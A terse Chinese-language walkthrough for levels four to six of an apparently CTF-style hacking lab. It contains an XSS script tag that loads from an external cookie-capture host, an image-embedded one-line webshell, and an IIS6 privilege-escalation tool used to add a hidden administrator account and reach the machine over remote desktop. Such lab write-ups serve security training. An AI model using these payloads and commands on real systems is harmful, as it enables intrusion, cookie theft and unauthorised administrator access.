4-6攻略

四题

xss网址  https://www.xss9.com

复制这句代码<sCRiPt sRC=https://xss9.com/rbQP></sCrIpT>

然后提交

注入成功

钓到了 

五题

cookie

勾上 cookie 点击一次    准备好了吗？

却掉勾选 再点一次  准备好了吗？

一句话木马（图片码）

注入成功

进入根目录

PS ： 我因为自己的图标 和根目录上的图标不一致  就没找出来 一度怀疑智商

六题

鼠标右键 上传 cmd和iis6

对着cmd右键虚拟终端

输入whoami

证明已经进入到了 对方的cmd

下面的任务  创建账号 ，远程端口  然后提权

创建账号

E:5\UploadFiles\> cd..

E:5\> E:\RECYCLER\iis6.exe "whoami"

提权

E:5\> E:\RECYCLER\iis6.exe "net user LostSoul 123456 /add"

创建账号成功

3389 端口

命令tasklist –svc  

Termsrvice→远程桌面的服务名  pid服务名  留意

命令netstat-ano

pid 服务名 相同

找到了3389 路径

提权管理员用户组

net localgroup administrators

E:5\>  E:\RECYCLER\iis6.exe "Net localgroup administrators LostSoul /add”

net localgroup administrators

点击win   点击运行  输入mstsc

链接

登录

如果遇到这个问题

在连接登录

然后就我的电脑C盘  flag